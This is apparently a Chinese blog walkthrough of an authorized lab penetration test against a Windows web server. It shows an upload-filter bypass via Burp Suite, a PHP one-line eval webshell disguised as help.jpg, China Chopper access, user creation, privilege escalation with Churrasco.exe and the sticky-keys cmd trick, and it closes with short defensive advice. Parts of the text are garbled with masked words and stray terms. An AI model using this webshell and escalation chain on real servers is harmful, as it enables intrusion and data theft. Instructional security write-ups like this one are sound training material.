一次图文并茂的***完整测试

 任务:某公司受权你对其服务器进行******。对某核心服务器进行***测试,据了解,该web服务器ip地址(10.1.1.178)存在敏感数据。php

      一、利用网站漏洞获取该服务器shellweb

      二、新建一用户并将权限提高至管理员sql

      三、得到服务器上的关键敏感数据(C:\console)内。shell

此文只做为学习安全

wKiom1U2BPiQHRdAAAYFuisHevk399.jpg

***流程服务器

一、探测信息ide

二、利用漏洞获得管理帐号密码工具

三、找到后台学习

四、登陆后台取得web权限测试

若是发现直接有上传漏洞就能够利用


1.找到上传漏洞

首先知道ip地址后打开网页访问找到站内上传点

wKiom1U2BajCKGSsAANiioUqIIE272.jpg

wKiom1U2Bh_RkwgEAABdtyzAKpY309.jpgwKioL1U2CC2BkQX-AABelclnTTc694.jpg

上传小马文件报错,只能上传图像文件,只能进行抓包

先进行代理设置

wKiom1U2BxnDIsoNAAKbGxAYTCc892.jpg

2.代理设置


谷歌插件Proxy SwitchySharp进行代理设置,而后开启burpsuite抓包这里就不作介绍了

软件教学能够百度去学习代理端口要同样

wKioL1U2ClfjmK73AAHdUEfTOZY264.jpg


3.抓包分析,并改包上传

开始抓包

wKioL1U2DWrg2XIdAAKKp02zgb8481.jpg

help.jpg内容

<?php 
eval($_POST['hao']);
?>

wKiom1U2DlaiNx72AAHCmiF1gr4543.jpg

修改从新上传,上传成功。

wKiom1U2DyiD9j8AAAExzL-QmvE029.jpg


4.获取webshell权限

上述的http就是小马地址,打开中国菜刀输入

wKioL1U2EU2BMYt0AAECJ7v7kgE398.jpg

获取webshell

wKiom1U2EB7R_yqfAAEwTNAGwJM566.jpg

5.提高管理权限

新建一用户并将权限提高至管理员

用cmd命令获取管理员权限

wKiom1U2ENbhjrhkAAC88AGiToQ304.jpg

添加一个用户hao而后让他加入管理员组但是失败了,没办法只能在此使用工具提权

wKioL1U2EwfCN4bdAAJRffdxXNA800.jpg

wKiom1U2EavjoKuqAAJVt5xGl88071.jpg

wKioL1U2EweAIZaYAAArE4qSqlQ052.jpg

上传脚本,而后重命名,并把php脚本复制到刚才脚本里从新命名后缀php

wKioL1U2FWmTVFQtAAEqJxm0-B8431.jpg

在网站提权中咱们常常会使用到这些工具Churrasco.exe (巴西烤肉) 

若是说webshell不能执行cmd那么咱们就须要上传一个cmd

若是说上传cmd后不能添加用户那么我咱们就须要上传软件提权

wKiom1U2FbHC238HAAQMYWX1egY815.jpg

设置终端路径

wKioL1U2F7Xh0tu_AACD0UkCMRg003.jpg

提权不成功没有administrators组

wKiom1U2HN3RGMGMAADFkQmVZEY840.jpg

进入远程桌面登录界面  按shift5次获得cmd whoami /all

wKiom1U2HDuzWL63AAGtPzpAouU489.jpg

咱们找到useras这个组加入进去就ok了

wKiom1U2HtyCwPUsAAEUuznC8SY331.jpg

wKiom1U2Ht3yXEJ5AACuYE15Jms503.jpg

一次图文并茂的***结束了。拷贝敏感数据就能够了,让你们以为***不在神秘,其实更高层次的技术也在研究中,下次带来sqlmap 注入实践教程。

6.安全建议:从上述***测试中发现该服务器

1.及时修补系统中的安全漏洞

2.细化服务器文件目录权限,杜绝权限漏洞

3.对于上传权限,能够经过修改服务器的配置来实现对这个漏洞的预防。不少网站都容许用户上传必定数量的图片、Flash 等,不少时候网站开发人员为了往后管理方便,对上传的文件都统一放到指定的一个文件夹里面,管理员只要对该文件夹的执行权限设置成“无”,这样必定程度能够对漏洞进行预防。

相关文章
相关标签/搜索